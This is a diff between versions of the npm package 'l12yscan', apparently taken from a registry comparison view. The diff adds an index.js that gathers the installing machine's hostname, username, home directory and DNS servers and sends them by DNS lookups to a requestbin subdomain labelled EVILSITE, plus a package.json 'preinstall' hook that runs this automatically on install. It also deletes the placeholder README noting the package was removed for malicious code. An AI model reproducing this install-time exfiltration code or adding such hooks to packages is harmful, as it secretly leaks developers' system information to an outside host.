l12yscan 0.0.1-security → 9.1.4

package/index.js

@@ -0,0 +1,47 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+
+var EVILSITE = "a11ecac394124334f732.d.requestbin.net";
+
+//replace
+// : --
+// / _
+// \ .
+
+
+// hostname 
+var r1 = dns.lookup("host."+os.hostname()+"."+EVILSITE, function (err, addresses, family) {
+  console.log();
+});
+
+// user_info 
+var r2 = dns.lookup("user."+os.userInfo().username+"."+EVILSITE, function (err, addresses, family) {
+  console.log();
+});
+
+// home_dir 
+var r3 = dns.lookup("dir."+os.homedir()+"."+EVILSITE, function (err, addresses, family) {
+  console.log();
+});
+
+// dns_data 
+var r4 = dns.lookup("dns."+dns.getServers().join(',')+"."+EVILSITE, function (err, addresses, family) {
+  console.log();
+});

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "l12yscan",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9.1.4",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "yassineaboukir",
+  "license": "ISC",
+  "description": ""
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=l12yscan for more information.